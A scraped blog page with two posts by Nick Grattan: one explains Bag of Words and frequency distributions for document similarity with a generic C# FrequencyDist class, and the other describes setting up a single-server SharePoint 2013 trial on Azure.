Reference: [1] “Mining of Massive Datasets” by A.Rajaraman, J. Leskovec, J.D. Ullman, Cambridge University Press. 2011. P.90. See http://infolab.stanford.edu/~ullman/mmds.html
Written by Nick Grattan
June 10, 2014 at 7:45 am
Bag of Words and Frequency Distributions in C#
with 5 comments
The simplest way of representing a document is the “Bag of Words”. This is the list of unique words used in a document. It is therefore a simple present/not present indicator for all words in the vocabulary and does not take into account the occurrence frequency of these words nor the order of the words.
The Bag of Words is used by the Jaccard Similarity measure for document similarity. If two documents have the same set of words then they are deemed identical, and if they have no common words they are completely different. This similarity measure takes no account of the relative length of the two documents being compared.
Bag of Words Similarity
In C# a Bag of Words can be represented by a generic List<>. The list type can either be a string (in which case it’s the actual word) or an integer (where the integer is a lookup into a dictionary). The latter is more efficient because the word is stored just once as a string and the integer lookup (4 bytes) is most likely to be shorter than the word itself. The C# in this blog post creates a dictionary, some Bag of Words and calculates the Jaccard index for documents.
Frequency Distributions record not only the words in a document but also the frequency with which they occur. However, like Bags of Words, no account is taken of the order of words in the document. These frequency distributions can be compared and used to assess the similarity between two or more documents.
Freq Dist
These techniques generally calculate the distance between two documents. A distance measure is the inverse of similarity. Common techniques are Euclidean, Manhattan and Cosine distances.
The following C# class manages Frequency Distributions. It’s a generic class, and so can use strings (the words themselves) or integers (for lookups into a dictionary).
/// <summary>
/// Manages Frequency Distributions for items of type T
/// </summary>
/// <typeparam name="T">Type for item</typeparam>
public class FrequencyDist<T>
{
/// <summary>
/// Construct Frequency Distribution for the given list of items
/// </summary>
/// <param name="li">List of items to calculate for</param>
public FrequencyDist(List<T> li)
{
CalcFreqDist(li);
}
/// <summary>
/// Construct Frequency Distribution for the given list of items, across all keys in itemValues
/// </summary>
/// <param name="li">List of items to calculate for</param>
/// <param name="itemValues">Entire list of itemValues to include in the frequency distribution</param>
public FrequencyDist(List<T> li, List<T> itemValues)
{
CalcFreqDist(li);
// add items to frequency distribution that are in itemValues but missing from the frequency distribution
foreach (var v in itemValues)
{
if(!ItemFreq.Keys.Contains(v))
{
ItemFreq.Add(v, new Item { value = v, count = 0 });
}
}
// check that all values in li are in the itemValues list
foreach(var v in li)
{
if (!itemValues.Contains(v))
throw new Exception(string.Format("FrequencyDist: Value in list for frequency distribution not in supplied list of values: '{0}'.", v));
}
}
/// <summary>
/// Calculate the frequency distribution for the values in list
/// </summary>
/// <param name="li">List of items to calculate for</param>
void CalcFreqDist(List<T> li)
{
itemFreq = new SortedList<T,Item>((from item in li
group item by item into theGroup
select new Item { value = theGroup.FirstOrDefault(), count = theGroup.Count() }).ToDictionary(q => q.value, q => q));
}
SortedList<T, Item> itemFreq = new SortedList<T, Item>();
/// <summary>
/// Getter for the Item Frequency list
/// </summary>
public SortedList<T, Item> ItemFreq { get { return itemFreq; } }
public int Freq(T value)
{
if(itemFreq.Keys.Contains(value))
{
return itemFreq[value].count;
}
else
{
return 0;
}
}
/// <summary>
/// Returns the list of distinct values between two lists
/// </summary>
/// <param name="l1"></param>
/// <param name="l2"></param>
/// <returns></returns>
public static List<T> GetDistinctValues(List<T> l1, List<T> l2)
{
return l1.Concat(l2).ToList().Distinct().ToList();
}
/// <summary>
/// Manages a count of items (int, string etc) for frequency counts
/// </summary>
/// <typeparam name="T">The type for item</typeparam>
public class Item
{
/// <summary>
/// The value of the item, e.g. int or string
/// </summary>
public T value { get; set; }
/// <summary>
/// The count of the item
/// </summary>
public int count { get; set; }
}
}
The following code shows how this class can be used:
List<string> li = new List<string>();
li.Add("One");
li.Add("Two");
li.Add("Two");
li.Add("Three");
li.Add("Three");
li.Add("Three");
FrequencyDist<string> cs = new FrequencyDist<string>(li);
foreach (var v in cs.ItemFreq.Values)
{
Console.WriteLine(v.value + " : " + v.count);
}
The output from executing this code is:
One : 1
Three : 3
Two : 2
Written by Nick Grattan
June 9, 2014 at 6:51 pm
Creating single server SharePoint 2013 trial for Windows Azure
with one comment
Creating virtual machines with Azure is a great way of standing up test servers, especially for SharePoint where the installation can be long.
You can create a SharePoint Server 2014 trial server from Azure by first selecting “From Gallery”:
ScreenHunter_99 Apr. 21 15.23
And then select the “SharePoint Server 2013 Trial”
ScreenHunter_98 Apr. 21 15.21
The problem with this is that SharePoint is already installed for a farm installation and therefore cannot be installed as a standalone server. As the description provided by Microsoft states, you will need to create another virtual machine for SQL Server and possibly another for a domain controller with Active Directory.
To circumvent this issue you can:
1. Create the VM using the gallery in Azure as shown above
2. Install SQL Server Express 2012 on the newly create VM
3. Create a new farm using the New-SPConfigurationDatabase PowerShell command
4. Run the SharePoint Products Configurations Wizard and join the farm you’ve just created.
The last three steps are described in this excellent blog article: http://blogs.msdn.com/b/suhasaraos/archive/2013/04/06/installing-sharepoint-2013-on-a-single-server-without-a-domain-controller-and-using-sql-server-express.aspx
Written by Nick Grattan
April 22, 2014 at 1:00 am
Follow
Get every new post delivered to your Inbox.
Join 64 other followers
|
__label__pos
| 0.984089 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.